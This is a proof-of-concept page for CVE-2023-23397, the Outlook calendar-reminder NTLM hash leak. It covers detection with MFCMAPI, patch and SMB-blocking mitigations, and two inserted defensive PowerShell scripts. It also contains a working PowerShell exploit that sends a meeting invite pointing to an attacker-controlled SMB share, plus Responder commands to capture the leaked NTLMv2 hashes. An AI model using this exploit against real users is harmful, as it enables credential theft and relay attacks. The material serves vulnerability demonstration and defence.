
POC details: 73582a7e0b5ec96248353d1a0ff8349c4b274f6b

Source
Associated vulnerability
Title: Microsoft Outlook security vulnerability (CVE-2023-23397)
Description: Microsoft Outlook is an email application from Microsoft Corporation (USA). Microsoft Outlook contains a security vulnerability. The following products and versions are affected: Microsoft Office LTSC 2021 for 32-bit editions, Microsoft Outlook 2016 (32-bit edition), Microsoft Office LTSC 2021 for 64-bit editions, Microsoft 365 Apps for Enterprise for
Description
Demonstration of the CVE-2023-23397 Outlook privilege escalation vulnerability
Introduction

# CVE-2023-23397 Exploitation & Mitigation Demo

## 📌 Overview

This project demonstrates the detection, exploitation, and mitigation of **CVE-2023-23397**, a critical zero-click NTLM relay vulnerability in Microsoft Outlook for Windows. Exploited via calendar invites, this vulnerability allows attackers to capture NTLMv2 hashes **without any user interaction**.

> 🛡️ **CVSS Score:** 9.8 (Critical)  
> 🖥️ **Affected Versions:** Outlook 2013, 2016, 2019, Microsoft 365 (before March 14, 2023 patch)

---

## ⚠️ Vulnerability Details

Outlook’s calendar reminders can be configured to play a custom sound via the `PidLidReminderFileParameter` MAPI property. Outlook does not validate this path, so a UNC path makes the client open a remote SMB connection, authenticating with the user’s NTLM credentials, as soon as the reminder fires.

```plaintext
\\attacker-ip\share\sound.wav
```

This causes NTLMv2 hashes to be sent to attacker-controlled servers, which can then:
- Be cracked offline (password recovery)
- Be used in NTLM relay attacks for privilege escalation

---

## 🔍 Detection Method

Use **MFCMAPI** to inspect calendar items and check for malicious values in `PidLidReminderFileParameter`. This is a named property in the `PSETID_Common` property set with LID `0x851F` and type PtypString, so the tag `0x851F001F` is the LID with its type suffix; MFCMAPI shows it under a store-assigned tag such as `0x808A001F`, which is why the steps below use that value.

### Steps:
1. Open MFCMAPI → `QuickStart > Open Folder > Calendar`
2. Go to `Table > Set Columns`
3. Add property tag `0x808A001F` to view reminder file paths
4. Look for UNC paths as an indicator of compromise
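A scripted version of the MFCMAPI check above, added here as an example and not part of the repository: it walks the default Calendar folder through the same Outlook COM interface the project's PoC uses and reports every appointment whose reminder file parameter is a UNC path (both the `\\host\share` and `\\?\UNC\host\share` forms). The DASL name used to read the named property through `PropertyAccessor`, and the fallback to `ReminderSoundFile`, are assumptions about how Outlook exposes the property; the script assumes Outlook is installed with a configured profile.

```powershell
# Added example (not the repository's code): scan the Calendar folder for
# appointments whose reminder sound points at a UNC path, the indicator of
# compromise the MFCMAPI steps look for.
$Outlook   = New-Object -ComObject Outlook.Application
$Namespace = $Outlook.GetNamespace("MAPI")
$Calendar  = $Namespace.GetDefaultFolder(9)   # 9 = olFolderCalendar

# DASL name of PidLidReminderFileParameter: named property in PSETID_Common
# ({00062008-0000-0000-C000-000000000046}), LID 0x851F, type PtypString (0x001F).
$ReminderFileProp = "http://schemas.microsoft.com/mapi/id/{00062008-0000-0000-C000-000000000046}/851F001F"

# Matches \\host\share\... and \\?\UNC\host\share\...
$UncPattern = '^\\\\(\?\\UNC\\)?[^\\]+\\'

$Findings = foreach ($Item in $Calendar.Items) {
    if ($Item.Class -ne 26) { continue }      # 26 = olAppointment

    # Prefer the raw MAPI property; fall back to the Object Model wrapper
    # (assumption: both return the same string when the property is set).
    $Path = $null
    try { $Path = $Item.PropertyAccessor.GetProperty($ReminderFileProp) } catch { }
    if (-not $Path) { $Path = $Item.ReminderSoundFile }

    if ($Path -and $Path -match $UncPattern) {
        [pscustomobject]@{
            Subject      = $Item.Subject
            Organizer    = $Item.Organizer
            Created      = $Item.CreationTime
            ReminderFile = $Path
        }
    }
}

if ($Findings) {
    Write-Warning ("{0} calendar item(s) carry a UNC reminder file path" -f @($Findings).Count)
    $Findings | Format-Table -AutoSize
} else {
    Write-Host "No UNC reminder file paths found in the Calendar folder."
}
```

Run it under the mailbox owner's account; a non-empty result is the same finding the MFCMAPI column would show, with the organizer and creation time added so the item can be traced back to the invite that delivered it.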

---

## 🛠️ Mitigation Techniques

### 1. Apply Microsoft Patch (Recommended)

Install the March 14, 2023 patch (e.g., KB5002044). The patch introduces:

- `IsFileZoneLocalIntranetOrTrusted()` to validate reminder file paths
- Group Policy options to define trusted domains

**Test Result:**  
Outlook will log **Event ID 1008** and block access to untrusted SMB paths.

---

### 2. IPsec Network-Level Mitigation (Temporary)

#### a. Block All SMB

- Blocks outbound TCP 445 (SMB)
- Prevents NTLM leaks to untrusted networks

#### b. Allow Trusted IPs Only

- Define internal IPs (e.g., `192.168.1.0/24`)
- Maintain business continuity for internal SMB usage

📂 Pre-built policy: [OutlookMitigation.ipsec](./Outlook%20mitgation.ipsec)
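The same two controls expressed as Windows Defender Firewall rules instead of an IPsec policy, added here as an example that is not the repository's `.ipsec` file. Because block rules take precedence over allow rules in Windows Firewall, the trusted subnet cannot be carved out with a separate allow rule; the block rule is instead scoped to every unicast address outside it. The `192.168.1.0/24` range is the README's example value, and the rule name is an assumption; run the script elevated.

```powershell
# Added example (not the repository's policy): host-firewall equivalent of the
# IPsec mitigation. Option (a) blocks all outbound SMB; option (b) blocks it
# except to the trusted internal subnet 192.168.1.0/24.
$RuleName = 'CVE-2023-23397 - block outbound SMB to untrusted hosts'

# Every unicast address except 192.168.1.0/24, as two ranges.
$UntrustedRanges = @(
    '1.0.0.0-192.168.0.255',
    '192.168.2.0-223.255.255.255'
)

# Option (a): block all outbound SMB. Uncomment to use instead of (b).
# New-NetFirewallRule -DisplayName $RuleName -Direction Outbound `
#     -Protocol TCP -RemotePort 445 -Action Block -Enabled True

# Option (b): block outbound SMB except to the trusted subnet.
New-NetFirewallRule -DisplayName $RuleName `
    -Direction Outbound -Protocol TCP -RemotePort 445 `
    -RemoteAddress $UntrustedRanges -Action Block -Enabled True

# Verify the rule and the address scope it was given.
Get-NetFirewallRule -DisplayName $RuleName | Get-NetFirewallAddressFilter

# Roll back with:
# Remove-NetFirewallRule -DisplayName $RuleName
```

After applying it, re-running the project's PoC against an attacker address outside the trusted range should produce no connection on Responder, while SMB to `192.168.1.0/24` keeps working; that is the verification the README describes for the IPsec policy.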

---

## 💻 Project Setup

### Environment

| System        | Username           | Password   |
|---------------|--------------------|------------|
| Kali Linux    | kali               | kali       |
| Windows 10 VM | CVE-2023-23397     | vbox@123   |
| Email Account | victim@exploit.com | vbox@123   |

---

### Attacker (Kali Linux)

```bash
sudo apt install responder
sudo responder -I eth0 -v
```

Make sure Kali and the victim VM are on the same network.

---

### Victim (Windows + Outlook 2013)

1. Install:
    - Outlook 2013
    - .NET 2.0
    - hMailServer
    - MFCMAPI

2. Setup:
    - hMailServer domain: `exploit.com`
    - Email user: `victim@exploit.com`

---

### 🚨 Exploitation ([PowerShell Script](./Outlook.ps1))

```powershell
# Initialize Outlook COM object
$Outlook = New-Object -ComObject Outlook.Application
$Namespace = $Outlook.GetNamespace("MAPI")
 
$ip = "192.168.1.7" # Attacker IP here
$emails = @("victim1@exploit.com")  # List of emails

# Create a new appointment item
$Appointment = $Outlook.CreateItem(1) # 1 corresponds to olAppointmentItem

# Set appointment properties
$Appointment.Subject = "CVE Presentation Demo Demo"
$Appointment.Body = "This is a test meeting, please ignore it."
$Appointment.Location = "Dubai"
$Appointment.Start = (Get-Date).AddSeconds(1) # Start time set to 1 second from now
$Appointment.Duration = 30 # Duration in minutes

# Configure reminder settings
$Appointment.ReminderSet = $true
$Appointment.ReminderMinutesBeforeStart = 0
$Appointment.ReminderOverrideDefault = $true
$Appointment.ReminderPlaySound = $true
$Appointment.ReminderSoundFile = "\\$ip\nonexistent\sound.wav"

foreach ($email in $emails) {
    $Appointment.Recipients.Add($email) | Out-Null
}

# Save and send the appointment
$Appointment.Save()
$Appointment.Send()
```

Responder will capture the NTLMv2 hash from the victim system.

---

## ✅ Verification

### Detection
- Use MFCMAPI to confirm `PidLidReminderFileParameter` contains a UNC path.

### Mitigation
- Apply patch or IPsec policy.
- Re-run script: Outlook may show a reminder but **no NTLM hash should be captured**.
---

## ❗ Limitations

- Blocking all SMB traffic can affect legitimate services (file sharing, domain auth)
- Maintaining trusted IPs can become operationally complex

---

File snapshot

[4.0K] /data/pocs/73582a7e0b5ec96248353d1a0ff8349c4b274f6b
├── [1.0K] LICENSE
├── [ 20K] Outlook mitgation.ipsec
├── [1.0K] Outlook.ps1
└── [4.3K] README.md
0 directories, 4 files